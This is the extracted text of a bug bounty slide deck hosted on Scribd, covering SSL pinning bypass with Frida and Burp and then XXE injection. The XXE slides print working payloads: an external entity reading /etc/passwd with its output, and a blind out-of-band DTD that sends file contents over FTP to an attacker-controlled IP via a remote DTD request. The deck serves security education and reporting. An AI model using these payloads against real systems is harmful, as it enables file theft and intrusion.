From SSL Pinning Bypass To Xxe Injection

Uploaded by

Uday Shelke

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

46 views13 pages

From SSL Pinning Bypass To Xxe Injection

Uploaded by

Uday Shelke

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 13

From SSL Pinning Bypass

to XXE Injection
I

1
$ curl https://who.are.we/api/v3/users | json_pp

{
"spenkk": {
"Name": "Arben Shala",
"Work": {
"Novus": "Cybersecurity Engineer",
"Hackerone": "Part-Time Bug Bounty Hunter"
}
I },

"0xcela": {
"Name": "Çlirim Emini",
"Work": {
"Cobalt Core": "Penetration Tester",
"Synack Red Team": "Bug Bounty Hunter",
"Hackerone": "Bug Bounty Hunter"
}
}
}

2
Intro to Bug
Bounty
- Beneﬁts
- Pentest vs Bug Bounty
- Where should I start?

Your Company Name 3

Intro to Bug
Bounty
- Firewalls
- *.scope

Your Company Name 4

Intro to Bug
Bounty

Why we should look into mobile

apps (Android/iOS)?

Your Company Name 5

SSL Pining Bypass

What is SSL Pinning?

Requirements for bypass:

- Web Proxy (e.x, BurpSuite)
- Rooted Android
- Frida-Tools

Your Company Name 6

SSL Pining Bypass

- How to conﬁgure network

and certiﬁcates between
Burpsuite and Genymotion?

https://spenkk.github.io/

Your Company Name 7

SSL Pining Bypass

- What is Frida?
- Why is mainly used for
Android testing?

Your Company Name 8

XXE Injection
<?xml version="1.0"?>
200 OK
<!DOCTYPE data [
root:x:0:0::/root:/bin/bash <!ELEMENT data (#ANY)>
bin:x:1:1::/:/usr/bin/nologin <!ENTITY ssrf SYSTEM "file:///etc/passwd">
daemon:x:2:2::/:/usr/bin/nologin ]>file
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
ftp:x:14:11::/srv/ftp:/usr/bin/nologin <root>
http:x:33:33::/srv/http:/usr/bin/nologin <question>What is XXE Injection?</question>
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
dbus:x:81:81:System Message Bus:/:/usr/bin/nologin <types>
systemd-journal-remote:x:982:982:systemd Journal Types of xxe injection:
Remote:/:/usr/bin/nologin
systemd-network:x:981:981:systemd Network <normal>Classic XXE</normal>
Management:/:/usr/bin/nologin <blind>Blind OOB</blind>
<techniques>&ssrf;</techniques>
<techniques>&ftp;</techniques>
<techniques>&gopher;</techniques>
<techniques>&http;</techniques>
</types>
Your Company Name </root> 9
XXE Injection
- Response received in Burp
collaborator server.

Your Company Name 10

Payload.dtd
<!ENTITY % trick SYSTEM " file:///etc/passwd ">
<!ENTITY % int
"<!ENTITY % send SYSTEM
XXE Injection
'ftp://our-ip/%trick;'>">
%int;
Protocols that we used for data exﬁltration:

Http -> fail

Gopher -> fail
Ftp -> success
Request

POST /redacted/redacted.php?function=GetDefaultCountry HTTP/1.1 Technique:

Host: secure.REDACTED.com
Blind OOB Injection
XMLDOC=%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C%
- Payload.dtd is hosted in our server
21DOCTYPE%20convert%20%5B%20%3C%21ENTITY%20%25%20
- We make a malicious request on our server and ask for
remote%20SYSTEM%20%22https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2FATTACKER-IP%22%
3E%25remote%3B%25int%3B%25trick%3B%5D%3E payload.dtd
- Payload.dtd asks for /etc/passwd

URL Decoded:
XMLDOC=<?xml version="1.0"?><!DOCTYPE convert [ <!ENTITY %
remote SYSTEM "http://ATTACKER-IP/">%remote;%int;%trick;]>
Your Company Name 11
XXE Injection